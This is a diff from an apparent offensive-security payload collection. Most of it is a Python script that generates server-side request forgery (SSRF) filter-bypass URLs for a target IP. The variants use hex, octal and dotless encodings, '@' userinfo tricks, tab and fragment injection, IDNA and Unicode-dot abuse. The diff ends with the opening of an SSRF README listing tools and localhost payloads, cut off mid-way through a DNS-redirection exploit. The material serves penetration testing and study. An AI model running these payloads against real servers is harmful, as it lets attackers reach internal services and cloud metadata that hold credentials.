+print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
+print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',sep='')
+print('http://',IP8,':',PORT,':80','/',sep='')
+print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 9 - Dotted hexadecimal + Dotted octal + Dotless decimal
+print(bluecolor,"Dotted hexadecimal + Dotted octal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP9 = HEX_SINGLE(ipFrag3,"yes") + "." + OCT_SINGLE(ipFrag2) + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
+print('http://',IP9,':',PORT,'/',sep='')
+print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
+print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',sep='')
+print('http://',IP9,':',PORT,':80','/',sep='')
+print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 10 - Dotted hexadecimal + Dotless decimal
+print(bluecolor,"Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP10 = HEX_SINGLE(ipFrag3,"yes") + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
+print('http://',IP10,':',PORT,'/',sep='')
+print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
+print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',sep='')
+print('http://',IP10,':',PORT,':80','/',sep='')
+print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 11 - Dotted octal with padding + Dotless decimal
+print(bluecolor,"Dotted octal with padding + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP11 = '0' + OCT_SINGLE(ipFrag3) + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
+print('http://',IP11,':',PORT,'/',sep='')
+print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
+print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',sep='')
+print('http://',IP11,':',PORT,':80','/',sep='')
+print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 12 - Dotted octal with padding + Dotted hexadecimal + Dotless decimal
+print(bluecolor,"Dotted octal with padding + Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+IP12 = '0' + OCT_SINGLE(ipFrag3) + "." + HEX_SINGLE(ipFrag2,"yes") + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
+print('http://',IP12,':',PORT,'/',sep='')
+print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
+print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
+print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',sep='')
+print('http://',IP12,':',PORT,':80','/',sep='')
+print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
+print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,':80','/',file=f,sep='')
+	print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+	print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
+
+#Case 13 - Abusing IDNA Standard
+print(bluecolor,"Abusing IDNA Standard: ",resetcolor,yellowcolor,"http://ß.localdomain.pw/", resetcolor,' -> ',yellowcolor,'http://cc.localdomain.pw/',resetcolor,' => ',bluecolor,'DNS',resetcolor,' => ',yellowcolor,'127.127.127.127',resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print('http://ß.localdomain.pw/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://ß.localdomain.pw/',file=f,sep='')
+
+#Case 14 - Abusing 。and ｡
+IPAddressParts = arg1.split(".")
+print(bluecolor,"Abusing 。and ｡: ",resetcolor,yellowcolor,"http://",IPAddressParts[0],"。",IPAddressParts[1],"。",IPAddressParts[2],"。",IPAddressParts[3],"/",resetcolor," and " ,yellowcolor,"http://",IPAddressParts[0],"｡",IPAddressParts[1],"｡",IPAddressParts[2],"｡",IPAddressParts[3],"/", resetcolor,' -> ',yellowcolor,"http://",IPAddressParts[0],".",IPAddressParts[1],".",IPAddressParts[2],".",IPAddressParts[3],"/",resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',sep='')
+print('http://',IPAddressParts[0],'｡',IPAddressParts[1],'｡',IPAddressParts[2],'｡',IPAddressParts[3],'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',file=f,sep='')
+	print('http://',IPAddressParts[0],'｡',IPAddressParts[1],'｡',IPAddressParts[2],'｡',IPAddressParts[3],'/',file=f,sep='')
+
+#Case 15 Abusing Enclosed Alphanumerics
+print(bluecolor,"Abusing Enclosed Alphanumerics:",resetcolor," ",yellowcolor,'http://',convertIP2EnclosedAlphanumericsValue(), resetcolor,'        -> ',yellowcolor,"http://",arg1,resetcolor,sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print('http://',convertIP2EnclosedAlphanumericsValue(),'/',sep='')
+print('http://',convert_ip(IP1),':',PORT,'/',sep='')
+print('http://',convert_ip(IP2),':',PORT,'/',sep='')
+print('http://',convert_ip(IP3),':',PORT,'/',sep='')
+print('http://',convert_ip(IP4),':',PORT,'/',sep='')
+print('http://',convert_ip(IP5),':',PORT,'/',sep='')
+print('http://',convert_ip(IP6),':',PORT,'/',sep='')
+print('http://',convert_ip(IP7),':',PORT,'/',sep='')
+print('http://',convert_ip(IP8),':',PORT,'/',sep='')
+print('http://',convert_ip(IP9),':',PORT,'/',sep='')
+print('http://',convert_ip(IP10),':',PORT,'/',sep='')
+print('http://',convert_ip(IP11),':',PORT,'/',sep='')
+print('http://',convert_ip(IP12),':',PORT,'/',sep='')
+print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+print("\n",sep='')
+if EXPORTRESULTS == 'export':
+	print('http://',convertIP2EnclosedAlphanumericsValue(),'/',file=f,sep='')
+	print('http://',convert_ip(IP1),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP2),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP3),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP4),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP5),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP6),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP7),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP8),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP9),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP10),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP11),':',PORT,'/',file=f,sep='')
+	print('http://',convert_ip(IP12),':',PORT,'/',file=f,sep='')
+
+if EXPORTRESULTS == 'export':
+	f.close()
+	print("\n",bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
+	print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+	print("Results are exported to: " + FILENAME,sep='')
+	print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
+	print(bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
+	print("\n",sep='')
--- a/Forgery/Images/Parser
+++ b/Forgery/Images/Parser
--- a/Forgery/Images/SSRF_Parser.png
+++ b/Forgery/Images/SSRF_Parser.png
--- a/Forgery/Images/SSRF_stream.png
+++ b/Forgery/Images/SSRF_stream.png
--- a/Forgery/Images/WeakParser.jpg
+++ b/Forgery/Images/WeakParser.jpg
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -0,0 +1,512 @@
+# Server-Side Request Forgery
+
+Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
+
+## Summary
+
+* [Tools](#tools)
+* [Payloads with localhost](#exploit-with-localhost)
+* [Bypassing filters](#bypassing-filters)
+* [SSRF exploitation via URL Scheme](#ssrf-via-url-scheme)
+* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
+* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
+  * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
+  * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
+  * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
+  * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
+  * [SSRF URL for Azure](#ssrf-url-for-azure)
+  * [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)
+  * [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)
+  * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
+  * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
+  * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
+  * [SSRF URL for Docker](#ssrf-url-for-docker)
+  * [SSRF URL for Rancher](#ssrf-url-for-rancher)
+
+## Tools
+
+- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
+- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
+
+## Payloads with localhost
+
+Basic SSRF v1
+
+```powershell
+http://127.0.0.1:80
+http://127.0.0.1:443
+http://127.0.0.1:22
+http://0.0.0.0:80
+http://0.0.0.0:443
+http://0.0.0.0:22
+```
+
+Basic SSRF - Alternative version
+
+```powershell
+http://localhost:80
+http://localhost:443
+http://localhost:22
+```
+
+Advanced exploit using a redirection
+
+```powershell
+1. Create a subdomain pointing to 192.168.0.1 with DNS A record  e.g:ssrf.example.com
